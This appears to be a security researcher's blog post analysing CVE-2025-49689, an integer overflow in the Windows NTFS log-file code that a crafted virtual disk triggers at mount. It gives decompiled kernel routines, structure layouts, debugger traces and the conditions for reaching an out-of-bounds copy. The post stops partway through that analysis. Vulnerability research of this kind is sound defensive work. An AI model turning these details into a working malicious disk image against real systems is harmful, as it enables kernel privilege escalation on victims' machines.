Intro

Filesystem implementations are old, complex, and not very well audited by independent researchers. In this article I would like to share a beautiful exploitation showcase for a vulnerability that I found in the Windows NTFS implementation. This vulnerability, CVE-2025-49689, is reachable through a specially crafted virtual disk (VHD).

Adversaries use virtual disks in their phishing campaigns as containers for malicious payloads. From the user's perspective, a virtual disk is just a container with files, like a ZIP or RAR archive. Recently my colleagues published a report about a phishing attack in which virtual disks were used. It was only a matter of time before advanced adversaries tried to use the virtual disk infrastructure for exploitation purposes.

In 2025, four vulnerabilities exploited in the wild were reported. Two of them were RCE and two were information disclosure vulnerabilities, one of which was chained with an RCE. Three of the four use a VHD as a container to reach a buggy filesystem implementation. It’s impressive. In-the-wild exploits were registered for the NTFS and FastFat implementations: CVE-2025-24993 and CVE-2025-24985, respectively.

In this article we discuss a beautiful root cause that leads to multiple corruptions, which fall one into another like a cascade of waterfalls. At the end we discuss how it can be exploited to achieve Escalation of Privileges.

Let’s go!

Root Cause Analysis

Before we start, I should mention that all definitions and memory layouts apply to Windows 11 22H2 amd64, build 10.0.22621.5037.

The vulnerability resides in the Log File Service (LFS) implementation and may be triggered during the mount process, which is implemented in the ntfs!NtfsMountVolume routine. LFS is designed to provide logging and recovery services for NTFS: undo, redo, checkpoint operations, and so on. By design, LFS may have different clients that work with it, but nowadays only a single client exists: NTFS. Each client has its own LCH (Log Client Structure), which is created in ntfs!LfsOpenLogFile. The memory layout of LCH is shown below.

00000000 struct LCH // sizeof=0x40

00000000 {

00000000 __int16 NodeTypeCode;

00000002 __int16 NodeByteSize;

...

00000008 LIST_ENTRY LchLinks;

00000018 LFCB *Lfcb;

00000020 LFS_CLIENT_ID ClientId;

...

00000030 __int32 ClientArrayByteOffset;

...

00000038 __int64 Sync;

00000040 };

The most important field that LCH holds is Lfcb. LFCB (Log File Control Block) is a structure that accumulates all required information about the state of the log file and is used across almost all of the LFS API. The LFCB is allocated and initialized in the ntfs!LfsAllocateLfcb routine. Part of the LFCB memory layout is shown below.

00000000 struct My_LFCB // sizeof=0x268

00000000 {

00000000 __int16 NodeTypeCode;

00000002 __int16 NodeByteSize;

...

00000008 LIST_ENTRY LchLinks;

00000018 __int64 FileObject;

00000020 __int64 FileSize;

00000028 __int32 LogPageSize;

0000002C __int32 LogPageMask;

00000030 __int32 LogPageInverseMask;

00000034 __int32 LogPageShift;

00000038 __int64 FirstLogPage;

00000040 __int64 field_40;

00000048 __int32 ReusePageOffset;

0000004C __int32 RestartDataOffset;

00000050 __int16 LogPageDataOffset;

...

00000054 __int32 RestartDataSize;

00000058 __int32 LogPageDataSize;

...

00000060 __int16 RecordHeaderLength;

...

00000068 __int64 SeqNumber;

...

00000078 __int32 SeqNumberBits;

0000007C __int32 FileDataBits;

...

000000C8 LFS_RESTART_AREA *LfsRestartArea;

000000D0 __int64 ClientArray;

000000D8 __int16 ClientArrayOffset;

...

000000E0 __int64 CachedRestartArea;

000000E8 __int32 CachedRestartAreaSize;

000000EC __int32 RestartAreaLength;

...

00000100 __int16 LogClients;

...

00000118 __int64 LastFlushedLsn;

...

00000170 __int64 TotalAvailable;

00000178 __int64 TotalAvailInPages;

00000180 __int64 TotalUndoCommitment;

00000188 __int64 MaxCurrentAvail;

00000190 __int64 CurrentAvailable;

00000198 __int32 ReservedLogPageSize;

...

000001A0 __int16 RestartUsaOffset;

000001A2 __int16 UsaArraySize;

000001A4 __int16 LogRecordUsaOffset;

000001A6 __int16 MajorVersion;

000001A8 __int16 MinorVersion;

..

000001AC __int32 Flags;

...

00000228 __int64 ReservedBuffes;

...

00000240 __int64 pfnTxfFlushTxfLsnForNtfsLsn;

...

00000250 __int64 pfnNtfsSendLogEvent;

...

00000268 };

For the sake of our analysis we need the following fields:

- TotalAvailable: the number of bytes available for log records. It is computed in ntfs!LfsUpdateLfcbFromRestart from values that come from LFS_RESTART_AREA. The content of the structures saved on disk has been extensively researched from the forensic side, and you can find descriptions of the file structures here, here and here, as well as a description of the logic.

- RecordHeaderLength: it has a constant value equal to sizeof(LFS_RECORD) == 30h

The actual content written by the client is opaque to LFS. To be able to service arbitrary data, LFS wraps client data into an LFS_RECORD structure. It has the following memory layout.

00000000 struct LFS_RECORD // sizeof=0x30

00000000 {

00000000 __int64 ThisLsn;

00000008 __int64 ClientPreviousLsn;

00000010 __int64 ClientUndoNextLsn;

00000018 __int32 ClientDataLength;

0000001C LFS_CLIENT_ID ClientId;

00000020 __int32 RecordType;

00000024 __int32 TransactionId;

00000028 __int16 Flags;

0000002A __int16 AlignWord;

0000002C __int8 ClientData[4];



00000030 };As you may see there is ClientDataLength field and ClientData field which actually holds data passed by LFS client and that length. LFS consists of numerous routines implemented in NTFS.sys with the Lfs prefix. One of them is ntfs!LfsFindLogRecord which is responsible for parsing and validating instance of LFS_RECORD. That function checks LfsRecord->ClientDataLength + Lfcb->RecordHeaderLength to be less or equal Lfcb->TotalAvailable. The code which is responsible for that check you can see in the picture below:

ntfs!LfsFindLogRecordIn assembler form selected check is:

PAGE:00000001C015472B 44 8B 41 18 mov r8d, [rcx+18h] ; ClientDataLength

PAGE:00000001C015472F 0F B7 57 60 movzx edx, word ptr [rdi+60h] ; RecordHeaderLength

PAGE:00000001C0154733 41 03 D0 add edx, r8d ; ClientDataLength + RecordHeaderLength

PAGE:00000001C0154736 8B C2 mov eax, edx

PAGE:00000001C0154738 48 3B 87 70 01 00 00 cmp rax, [rdi+170h] ; TotalAvailable

PAGE:00000001C015473F 7D 47 jge short loc_1C0154788

This check is insufficient with respect to integer overflow. An attacker can easily edit the contents of a VHD, and therefore the contents of the LFS structures, replacing the value of ClientDataLength with something large such as FFFFFFFFh to bypass the check. For example, if ClientDataLength is set to FFFFFFFFh, adding 30h wraps the 32-bit sum around to 2Fh, so the check passes, but the field itself remains FFFFFFFFh, which may lead to memory corruption wherever that field is used later.
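To make the wraparound concrete, here is a minimal C++ sketch of the arithmetic. The function names are mine and hypothetical; only the order of operations (32-bit add, zero extension, 64-bit signed compare) is taken from the disassembly above. The second function is an illustrative hardened variant, not the vendor's fix.

```cpp
#include <cstdint>

// Mirrors the disassembly: the sum is formed in a 32-bit register
// (add edx, r8d), zero-extended (mov eax, edx) and only then compared
// with the 64-bit TotalAvailable.
// Returns true when the record is accepted, i.e. when jge is not taken.
bool check_as_compiled(std::uint32_t client_data_length,
                       std::uint16_t record_header_length,
                       std::int64_t total_available) {
    std::uint32_t sum = client_data_length + record_header_length;  // wraps modulo 2^32
    return static_cast<std::int64_t>(sum) < total_available;
}

// Hypothetical hardened variant (an assumption, not the actual patch):
// widen to 64 bits before adding, so the sum cannot wrap.
bool check_widened(std::uint32_t client_data_length,
                   std::uint16_t record_header_length,
                   std::int64_t total_available) {
    std::int64_t sum = static_cast<std::int64_t>(client_data_length) + record_header_length;
    return sum < total_available;
}
```

With ClientDataLength = FFFFFFFFh, RecordHeaderLength = 30h and a TotalAvailable of 1F4100h (the value visible in the WinDbg trace later in this article), check_as_compiled accepts the record while check_widened rejects it.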

Turning IntegerOverflow to MemoryCorruption

As you can see in the picture with the decompiled code of ntfs!LfsFindLogRecord, different fields of the LFS_RECORD structure are returned to the caller via pointer arguments. The value of ClientDataLength is returned via argument #8.

__int32 __fastcall LfsFindLogRecord(

My_LFCB *a1,

My_LEB *Leb,

__int64 Lsn,

__int32 *RecordType,

__int32 *TableLength,

__int64 *ClientUndoNextLsn,

__int64 *ClientPreviousLsn,

__int32 *CurrentLogRecordLength,

My_NTFS_LOG_RECORD_HEADER **CurrentLogRecord,

__int32 *pStatus)

{

...

*RecordType = (*p_RecordHeader)->RecordType;

*TableLength = (*p_RecordHeader)->TransactionId;

*ClientUndoNextLsn = (*p_RecordHeader)->ClientUndoNextLsn;

*ClientPreviousLsn = (*p_RecordHeader)->ClientPreviousLsn;

*LogRecord = Leb->CurrentLogRecord;

result = (int)LogRecordLength;

*LogRecordLength = (*p_RecordHeader)->ClientDataLength; // this value should be tracked back (arg #8)

return result;

}

Where is ntfs!LfsFindLogRecord called? There are two references to that function in NTFS.sys: from ntfs!LfsReadLogRecord and from ntfs!LfsReadNextLogRecord. ntfs!LfsReadNextLogRecord is called during the analysis pass; strictly speaking, it is reachable through the mount process as well, but it is much more difficult to set up than ntfs!LfsReadLogRecord. ntfs!LfsReadLogRecord is responsible for filling the LEB (Log Enumeration Block) structure. Part of the decompiled code is shown below.

void __fastcall LfsReadLogRecord(My_LCH *a1, __int64 Lsn, __int32 ContextMode, My_LEB *Leb, __int32 *Status) {

...

memset(Leb, 0, sizeof(My_LEB));

*(_DWORD *)&Leb->NodeTypeCode = 0x580800;

Leb->ClientId = (__int32)a1->ClientId;

Leb->ContextMode = ContextMode;

LfsFindLogRecord(

Lfcb,

Leb,

Lsn,

&Leb->RecordType,

&Leb->TableLength, // if ( (a7 & 1) == 0 && ((unsigned __int64)a5 - 0x18) % a6 )

&Leb->ClientUndoNextLsn,

&Leb->ClientPreviousLsn,

&Leb->CurrentLogRecordLength,

&Leb->CurrentLogRecord,

Status);

RecordHeader = Leb->RecordHeader;

Leb->NoRedo = (RecordHeader->Flags & 2) != 0; // or: 2,3,4,5,6,7,10,11,12,13,14,15,18,19,20,21,22,23,26,27,28,29,30,31,34,35,36,37

Leb->NoUndo = (RecordHeader->Flags & 4) != 0; // and: 0x6,0x7,0xe,0xf,0x16,0x17,0x1e,0x1f

LfsReleaseLch((__int64)a1);

...

}

00000000 struct LEB // sizeof=0x58

00000000 {

00000000 __int16 NodeTypeCode;

00000002 __int16 NodeByteSize;

...

00000008 My_LFS_RECORD_HEADER *RecordHeader;

00000010 __int64 RecordHeaderBcb;

00000018 __int32 ContextMode;

0000001C __int32 ClientId;

...

00000028 __int64 ClientUndoNextLsn;

00000030 __int64 ClientPreviousLsn;

00000038 __int32 RecordType;

0000003C __int32 TableLength;

00000040 __int32 CurrentLogRecordLength;

..

00000048 My_NTFS_LOG_RECORD_HEADER *CurrentLogRecord;

00000048

00000050 __int8 AuxilaryBuffer;

00000051 __int8 NoRedo;

00000052 __int8 NoUndo;

...

00000058 };

ntfs!LfsReadLogRecord may be reached via numerous functions, but only ntfs!ReadRestartTable is directly reachable through the mount process via a path that doesn’t involve the analysis pass. ntfs!ReadRestartTable is just a wrapper around ntfs!LfsReadLogRecord with a couple of additional function calls that validate My_NTFS_LOG_RECORD_HEADER (ntfs!NtfsCheckLogRecord) and RESTART_TABLE (ntfs!NtfsCheckRestartTable). The memory layouts of both structures are shown below:

00000000 struct RESTART_TABLE // sizeof=0x18

00000000 {

00000000 __int16 EntrySize;

00000002 __int16 NumberEntries;

00000004 __int16 NumberAllocated;

00000006 __int16 Reserved[3];

0000000C __int32 FreeGoal;

00000010 __int32 FirstFree;

00000014 __int32 LastFree;

00000018 };

00000000 struct NTFS_LOG_RECORD_HEADER // sizeof=0x28

00000000 {

00000000 __int16 RedoOperation;

00000002 __int16 UndoOperation;

00000004 __int16 RedoOffset;

00000006 __int16 RedoLength;

00000008 __int16 UndoOffset;

0000000A __int16 UndoLength;

0000000C __int16 TargetAttribute;

0000000E __int16 LcnsToFollow;

00000010 __int16 RecordOffset;

00000012 __int16 AttributeOffset;

00000014 __int16 ClusterBlockOffset;

00000016 __int16 Reserved;

00000018 __int64 TargetVcn;

00000020 __int64 LcnsForPage[1];

00000028 };

Both ntfs!NtfsCheckLogRecord and ntfs!NtfsCheckRestartTable use the CurrentLogRecordLength (ClientDataLength) field. All checks in ntfs!NtfsCheckLogRecord are bypassed automatically because the CurrentLogRecordLength value is extremely high and we control the values of RedoLength, UndoLength, RedoOffset and UndoOffset. This is the list of checks related to the CurrentLogRecordLength field.

- CurrentLogRecordLength should be greater than 28h

- LogRecord->RedoLength + LogRecord->RedoOffset should be less than CurrentLogRecordLength

- LogRecord->UndoLength + LogRecord->UndoOffset should be less than CurrentLogRecordLength
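The three length checks listed above can be restated as a small C++ predicate. This is only a sketch of the conditions as they are described in this article, not the decompiled ntfs!NtfsCheckLogRecord; the struct and function names are hypothetical.

```cpp
#include <cstdint>

// Only the fields that take part in the length checks; the names follow
// the NTFS_LOG_RECORD_HEADER layout shown above.
struct LogRecordLengths {
    std::uint16_t RedoOffset;
    std::uint16_t RedoLength;
    std::uint16_t UndoOffset;
    std::uint16_t UndoLength;
};

// Hypothetical restatement of the checks listed in the text.
bool length_checks_pass(const LogRecordLengths& r,
                        std::uint32_t current_log_record_length) {
    if (current_log_record_length <= 0x28) return false;
    // Widen to 32 bits so the two 16-bit fields cannot wrap when added.
    if (std::uint32_t{r.RedoOffset} + r.RedoLength >= current_log_record_length) return false;
    if (std::uint32_t{r.UndoOffset} + r.UndoLength >= current_log_record_length) return false;
    return true;
}
```

With a CurrentLogRecordLength of FFFFFFFFh, any combination of 16-bit offsets and lengths passes, because their sum can never reach the length.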

The same goes for the checks in ntfs!NtfsCheckRestartTable, except that it uses a TableSize value, determined as TableSize = CurrentLogRecordLength - LogRecord->RedoOffset. Again, all of those checks can be bypassed because we control the content of the EntrySize, NumberEntries and other fields. This is the list of checks related to the TableSize value.

- RestartTable->EntrySize should be less than TableSize

- RestartTable->EntrySize + 18h (sizeof(RESTART_TABLE)) should be less than TableSize

- (TableSize - 18h) / RestartTable->EntrySize should not be less than RestartTable->NumberEntries

Let’s go back to ntfs!ReadRestartTable. It not only reads and validates the log record; it also returns a pointer to the RESTART_TABLE data and the length of the table. This is how they are computed.
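The TableSize checks can be sketched the same way. Again, this is a hypothetical restatement and not the decompiled ntfs!NtfsCheckRestartTable. One assumption is worth stating loudly: the third check is written here as "the declared entries must fit in the table", that is NumberEntries <= (TableSize - 18h) / EntrySize, which is the reading consistent with the field values used later in this article (EntrySize = 4343h, NumberEntries = 1).

```cpp
#include <cstdint>

// Only the fields that take part in the size checks.
struct RestartTableHeader {
    std::uint16_t EntrySize;
    std::uint16_t NumberEntries;
};

constexpr std::uint32_t kRestartTableHeaderSize = 0x18;  // sizeof(RESTART_TABLE)

// Hypothetical restatement of the checks listed in the text.
bool table_checks_pass(const RestartTableHeader& t,
                       std::uint32_t current_log_record_length,
                       std::uint16_t redo_offset) {
    // 32-bit unsigned subtraction, as in TableSize = CurrentLogRecordLength - RedoOffset.
    std::uint32_t table_size = current_log_record_length - redo_offset;
    if (t.EntrySize == 0) return false;  // guard added for this sketch: avoid dividing by zero
    if (t.EntrySize >= table_size) return false;
    if (std::uint64_t{t.EntrySize} + kRestartTableHeaderSize >= table_size) return false;
    // Assumption: the declared number of entries must fit into the table.
    return t.NumberEntries <= (table_size - kRestartTableHeaderSize) / t.EntrySize;
}
```

Because TableSize is derived from the attacker-controlled length, a value close to FFFFFFFFh makes every one of these comparisons succeed for any 16-bit EntrySize and NumberEntries.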

__int64 __fastcall ReadRestartTable(

My_IRP_CONTEXT *IrpContext,

My_VCB *Vcb,

__int64 Lsn,

My_LEB *Leb,

_DWORD *RestartTableLength)

{

...

*RestartTableLength = Leb->CurrentLogRecordLength - LogRecordOffset;

return (__int64)CurrentLogRecord + LogRecordOffset;



}Now we can go one level up and look at ntfs!InitializeRestartState. This function is responsible for loading all restart tables and completing preparation before ntfs!AnalysisPass will be started. Here you can find a couple of calls to ntfs!ReadRestartTable for different restart tables (Open Attribute Table, Transaction Table, Dirty Page Table and so on). Almost all of that calls will be accompanied with following sequence of code.

- nt!ExAllocatePoolWithTag with tag 5246744Eh (NtfR) and size equal to RestartAreaLength

- nt!memmove with the destination set to the pointer to the memory allocated in the previous step, the source set to the pointer to the restart table data, and the length set to the value of RestartAreaLength

If we could reach that code, it would cause an out-of-bounds read, because the buffer that holds the restart table data is obviously not large enough to complete this operation without corruption. The minimum size of a VHD that we can create is 8 MB, while this memmove requires about 4 GB of data to complete. Seems easy, doesn’t it? Let’s try to reach that code.
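A quick back-of-the-envelope check of those sizes, as a hedged C++ sketch. The subtraction is the one shown in ntfs!ReadRestartTable above; the helper names and the example offset of 100h are my own assumptions for illustration.

```cpp
#include <cstdint>

constexpr std::uint64_t kMinVhdBytes = 8ull * 1024 * 1024;  // 8 MB, as stated above

// Same 32-bit unsigned subtraction as in ReadRestartTable.
constexpr std::uint32_t restart_table_length(std::uint32_t current_log_record_length,
                                             std::uint32_t log_record_offset) {
    return current_log_record_length - log_record_offset;
}

// True when a copy of `length` bytes cannot be satisfied by `backing_bytes` of data.
constexpr bool copy_overruns(std::uint32_t length, std::uint64_t backing_bytes) {
    return length > backing_bytes;
}
```

For example, restart_table_length(0xFFFFFFFF, 0x100) yields FFFFFEFFh, which is several hundred times larger than the whole 8 MB disk, let alone the buffer holding a single log record.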

Trigger

First of all we need a VHD, which is quite easy to create using the standard WinAPI CreateVirtualDisk (examples provided by Microsoft can be found here). In my experiments I used a disk with CREATE_VIRTUAL_DISK_FLAG_FULL_PHYSICAL_ALLOCATION and a size of 10 MB. After creating the disk, you need to create a volume and format it with the NTFS filesystem. I did it manually via the Disk Management utility.

Now let’s try to mount our disk and set a breakpoint in WinDbg at ntfs!NtfsMountVolume.

Breakpoint 0 hit

rax=ffff940a4d5949b8 rbx=0000000000000000 rcx=ffff940a4d328668

rdx=ffff940a4d594660 rsi=ffff940a4d594660 rdi=0000000000000000

rip=fffff8061d09e190 rsp=ffffdb864a6847c8 rbp=ffffdb864a6848e0

r8=ffffdb864a684800 r9=ffffdb864a684810 r10=fffff80617b38ce0

r11=0000000000000000 r12=0000000000000001 r13=0000000000000000

r14=ffff940a4d328668 r15=ffff940a4d594660

iopl=0 nv up ei pl zr na po nc

cs=0010 ss=0000 ds=002b es=002b fs=0053 gs=002b efl=00040246

Ntfs!NtfsMountVolume:

fffff806`1d09e190 4c8bdc mov r11,rsp

Alright, our disk and volume were correctly created and formatted, and we have reached a good starting point. Let’s move on and try to hit ntfs!InitializeRestartState.

Breakpoint 1 hit

rax=ffffdb864a683ec0 rbx=ffff940a503aa1b0 rcx=ffff940a4d328668

rdx=ffff940a503aa1b0 rsi=ffff940a4d328668 rdi=0000000000000000

rip=fffff8061d0e30cc rsp=ffffdb864a683e78 rbp=ffffdb864a6848e0

r8=ffffdb864a683ee0 r9=ffffdb864a683eb8 r10=fffff80617bbfe60

r11=ffffdb864a683fe8 r12=0000000000000000 r13=0000000000000000

r14=ffffdb864a68417e r15=ffff940a503aa1b0

iopl=0 nv up ei pl zr na po nc

cs=0010 ss=0000 ds=002b es=002b fs=0053 gs=002b efl=00040246

Ntfs!InitializeRestartState:

fffff806`1d0e30cc 4053 push rbx

Our freshly created VHD almost reaches the vulnerable code. The next station is ntfs!ReadRestartTable. Aaaaaaand we don’t hit ntfs!ReadRestartTable. The system successfully mounts the VHD and Explorer pops up a window with the empty content of our filesystem. The first hypothesis: does a freshly created VHD not have any restart table? Let’s open the target VHD in a hex editor and try to find the RSTR and RCRD magics (LFS_RESTART_PAGE and LFS_RECORD_PAGE). We quickly realize that at least the restart pages exist.



Now let’s trace ntfs!InitializeRestartState forward and figure out what is executed and what is not. If you do that exercise, you find out that ntfs!LfsReadRestartArea actually returns some data, but that data is then erased by memset and execution of ntfs!InitializeRestartState continues normally. ntfs!LfsReadRestartArea is responsible for reading the RESTART_AREA structure.

From the decompiled code it is clear that execution reaches the branch with memset only if the bCached variable is TRUE. The value of that variable is defined in ntfs!LfsReadRestartArea. Part of the decompiled code of ntfs!LfsReadRestartArea you can find below.

There are two options to prevent bCached from being set to TRUE.

- Somehow prevent initialization of Lfcb->CachedRestartArea. It is a pointer that serves as a source for RESTART_AREA

- Change the value of the ClientRestartLsn field. Its offset is 08h

Let’s hit ntfs!LfsReadRestartArea once more and take a look at the content of LFCB->ClientArray. The first hit happens at the following place:

1: kd> K

# Child-SP RetAddr Call Site

00 ffffaf86`4ea4bc58 fffff805`5c468915 Ntfs!LfsReadRestartArea

01 ffffaf86`4ea4bc60 fffff805`5c5c4a1b Ntfs!LfsCaptureClientRestartArea+0x14d

02 ffffaf86`4ea4bce0 fffff805`5c5c3db6 Ntfs!LfsRestartLogFile+0x967

03 ffffaf86`4ea4be60 fffff805`5c5c5a4c Ntfs!LfsOpenLogFile+0xb6

04 ffffaf86`4ea4bf00 fffff805`5c59f900 Ntfs!NtfsStartLogFile+0x1b4

05 ffffaf86`4ea4bff0 fffff805`5c55b74b Ntfs!NtfsMountVolume+0x1770

06 ffffaf86`4ea4c7d0 fffff805`5c4575ab Ntfs!NtfsCommonFileSystemControl+0xd7

07 ffffaf86`4ea4c8b0 fffff805`58ed8c25 Ntfs!NtfsFspDispatch+0x62b

08 ffffaf86`4ea4ca00 fffff805`58eded97 nt!ExpWorkerThread+0x155

09 ffffaf86`4ea4cbf0 fffff805`59019a24 nt!PspSystemThreadStartup+0x57

0a ffffaf86`4ea4cc40 00000000`00000000 nt!KiStartSystemThread+0x34

ntfs!LfsCaptureClientRestartArea is responsible for filling the restart cache and setting the Lfcb->CachedRestartArea field. The content of the LFS_CLIENT_RECORD pointed to by the LFCB->ClientArray field is shown below.

1: kd> p

rax=ffff808146470010 rbx=ffff8081466261f0 rcx=0000000000000001

rdx=0000000000000000 rsi=ffffaf864ea4bcf0 rdi=ffff808146fed890

rip=fffff8055c5e4576 rsp=ffffaf864ea4bbd0 rbp=ffffaf864ea4bf89

r8=ffffd60cf6f4e6c0 r9=ffffaf864ea4bc01 r10=fffff80558ec5d40

r11=ffffaf864ea4bb60 r12=ffff808146470050 r13=ffffaf864ea4bce8

r14=0000000000000000 r15=0000000000000000

iopl=0 nv up ei ng nz ac po cy

cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00040297

Ntfs!LfsReadRestartArea+0x8a:

fffff805`5c5e4576 430fb7442714 movzx eax,word ptr [r15+r12+14h] ds:002b:ffff8081`46470064=0000

1: kd> db r12

ffff8081`46470050 08 44 18 00 00 00 00 00-15 44 18 00 00 00 00 00 .D.......D......

ffff8081`46470060 ff ff ff ff 00 00 00 00-00 00 00 00 08 00 00 00 ................

ffff8081`46470070 4e 00 54 00 46 00 53 00-00 00 00 00 00 00 00 00 N.T.F.S.........

ffff8081`46470080 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

ffff8081`46470090 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

ffff8081`464700a0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

ffff8081`464700b0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

ffff8081`464700c0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

But if we continue execution of the mount thread and hit ntfs!LfsReadRestartArea called from ntfs!InitializeRestartState, we may notice that the content of LFS_CLIENT_RECORD has somehow changed, and now ntfs!LfsReadRestartArea will return the cached value instead.

rax=0000000000000000 rbx=ffff8081466261f0 rcx=0000000000000001

rdx=0000000000000000 rsi=ffffaf864ea4bb04 rdi=ffff80814710eb70

rip=fffff8055c5e458e rsp=ffffaf864ea4ba30 rbp=ffffaf864ea4c8e0

r8=ffffd60cf6f51b90 r9=ffffaf864ea4bb01 r10=fffff80558ec5d40

r11=ffffaf864ea4b9c0 r12=ffff808146462050 r13=ffffaf864ea4bb01

r14=0000000000000000 r15=0000000000000000

iopl=0 nv up ei pl zr na po nc

cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00040246

Ntfs!LfsReadRestartArea+0xa2:

fffff805`5c5e458e 488b97e0000000 mov rdx,qword ptr [rdi+0E0h] ds:002b:ffff8081`4710ec50=ffff808146493510

0: kd> db r12

ffff8081`46462050 00 00 28 00 00 00 00 00-00 00 00 00 00 00 00 00 ..(.............

ffff8081`46462060 ff ff ff ff 00 00 00 00-00 00 00 00 08 00 00 00 ................

ffff8081`46462070 4e 00 54 00 46 00 53 00-00 00 00 00 00 00 00 00 N.T.F.S.........

ffff8081`46462080 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

ffff8081`46462090 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

ffff8081`464620a0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

ffff8081`464620b0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

ffff8081`464620c0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

This means that we can’t just patch the ClientRestartLsn value in the VHD: it may change during execution. We need to completely prevent the caching operation in order to force a read of the restart area when ntfs!InitializeRestartState is reached. We cannot simply ignore the cache either: recall that when bCached is set to TRUE, the data read from the VHD is erased. Fortunately, there is a way, albeit a quite complicated one, to prevent the call to ntfs!LfsCaptureClientRestartArea without breaking the NTFS filesystem parser.

Let’s look at ntfs!LfsCaptureClientRestartArea. It’s a fairly simple function that creates a dummy LCH structure, fills it, and calls ntfs!LfsReadRestartArea twice. The first call determines the size of the restart area and the second one actually reads it.

__int64 __fastcall LfsCaptureClientRestartArea(

My_LFCB *Lfcb,

__int32 *pszBuffer,

My_RESTART_AREA **pBuffer,

__int32 *pStatus)

{

...

restarted = LfsReadRestartArea(LogHandle, (unsigned int *)&NumberOfBytes, 0LL, &v16, v15, v18);

if ( restarted == 0xC0000023 )

{

PoolWithTag = (My_RESTART_AREA *)ExAllocatePoolWithTag((POOL_TYPE)17, (unsigned int)NumberOfBytes, 0x7273664Cu);

restarted = LfsReadRestartArea(LogHandle, (unsigned int *)&NumberOfBytes, PoolWithTag, &v16, v15, v12);

}

if ( restarted >= 0 && !v16 )

{

*pBuffer = PoolWithTag;

*pszBuffer = NumberOfBytes;

}

...

}

This function is called from ntfs!LfsRestartLogFile. The decompiled code responsible for the condition and the call to ntfs!LfsCaptureClientRestartArea is shown below:

LFCB *LfsRestartLogFile(PFILE_OBJECT FileObject, __int64 a2, int a3, ...)

{

...

if ( (v96->LfsFlags & 0x19) == 0 && *v12 == 11 )// 19h = 10h | 08h | 01h

{

LfsCaptureClientRestartArea(Lfcb, &v78, &v80, v12);

ClientData = (PVOID)Lfcb->LastFlushedLsn;

LfsReleaseLfcb(Lfcb);

LfsDeallocateLfcb(Lfcb, 1);

Lfcb = LfsAllocateLfcb(v43, (__int64)v91, v92);

P = Lfcb;

...

Lfcb->CachedRestartAreaSize = v78;

Lfcb->CachedRestartArea = (__int64)v80;

...

}

As you can see, we need to violate one of the two conditions:

- Somehow force bit 4, 3 or 0 to be set in the LfsFlags field.

- Prevent the value pointed to by v12 from being equal to 11.
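The condition from the decompiled code can be isolated into a tiny C++ predicate, which makes the two ways of violating it easier to see. The constant and function names below are hypothetical; the mask 19h and the status value 11 come from the listing above.

```cpp
#include <cstdint>

constexpr std::uint32_t kBlockingFlags = 0x10 | 0x08 | 0x01;  // 19h: bits 4, 3 and 0
constexpr std::int32_t kCaptureStatus = 11;                   // the value *v12 is compared with

// True when LfsRestartLogFile would call LfsCaptureClientRestartArea,
// according to the condition in the decompiled listing.
constexpr bool capture_is_called(std::uint32_t lfs_flags, std::int32_t status) {
    return (lfs_flags & kBlockingFlags) == 0 && status == kCaptureStatus;
}
```

Setting any one of the three flag bits, or making the status anything other than 11, is enough to skip the capture.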

Understanding the first condition requires extensive reverse engineering of the driver. I won’t describe that process here and will just translate the flags into their actual meaning.

- 10h: it depends on the VCB field at offset 18h. I didn’t find a way to set that field to the required value.

- 08h: it may be achieved if nt!RtlCheckPortableOperatingSystem completes successfully and returns TRUE in its first argument, which is not possible under normal circumstances. Alternatively, we need to force VCB->VcbState to receive VCB_STATE_FLUSH_VOLUME_ON_IO, but I didn’t find a way to achieve that. Let me know if you know 🙂

- 01h: it is raised when the VCB_STATE_MOUNT_READ_ONLY flag is set. This flag may be achieved by making the VHD read-only, but that completely disables all the code responsible for the restart functionality. That is quite logical: why keep a log of operations if there are no modifications at all?

From our current understanding of LfsFlags, it does not look like an option. Let’s move on and look at v12 and how it receives its value. During the execution of ntfs!LfsRestartLogFile, the local variable v12 is passed into numerous functions, and after a quick analysis its meaning becomes clear: it is a pointer to a status value that is set by each function it is passed to. That means we need to manipulate the status set by the nearest call that receives it, which is the call to ntfs!LfsFindLastLsn.

ntfs!LfsFindLastLsn is quite a big function, and if we scroll down the decompiled text we find the place where the value pointed to by v12 is filled in.

void __fastcall LfsFindLastLsn(My_LFCB *Lfcb, __int32 *pStatus) {

...

if ( LastKnownLsn == LastFlushedLsn )

{

if ( v112 && (Lfcb->Flags & 0x40000) != 0 )

v30 = 11;

*pStatus = v30;

}

else

{

*pStatus = (LastKnownLsn != Lfcb->LastFlushedLsn) + 2;

}

...

}

LastKnownLsn and LastFlushedLsn are initialized at the beginning of the function with the value of Lfcb->LastFlushedLsn. Lfcb->LastFlushedLsn is initialized in ntfs!LfsUpdateLfcbFromRestart with the value of the CurrentLsn field of the LFS_RESTART_AREA structure. During the execution of ntfs!LfsFindLastLsn only LastKnownLsn changes, while LastFlushedLsn remains the same.



The easiest way to make LastKnownLsn and LastFlushedLsn unequal is to trace ntfs!LfsFindLastLsn, figure out which code is executed and which is not, and notice that under default conditions LastKnownLsn is set to the value of the LFS_RECORD_PAGE_HEADER->Packed.LastKnownLsn field of FirstTailPage.

To find the offset of that field inside the VHD, let’s briefly discuss how ntfs!LfsFindLastLsn reads tail pages. It calls ntfs!LfsPinOrMapData, which is defined as:

__int64 __fastcall LfsPinOrMapData(LFCB *Lfcb, __int64 FileOffset, __int32 Length, __int8 PinData, __int64 a5, __int8 AllowErrors, __int8 *UsaError, __int64 Buffer, __int64 Bcb, __int32 *pStatus)

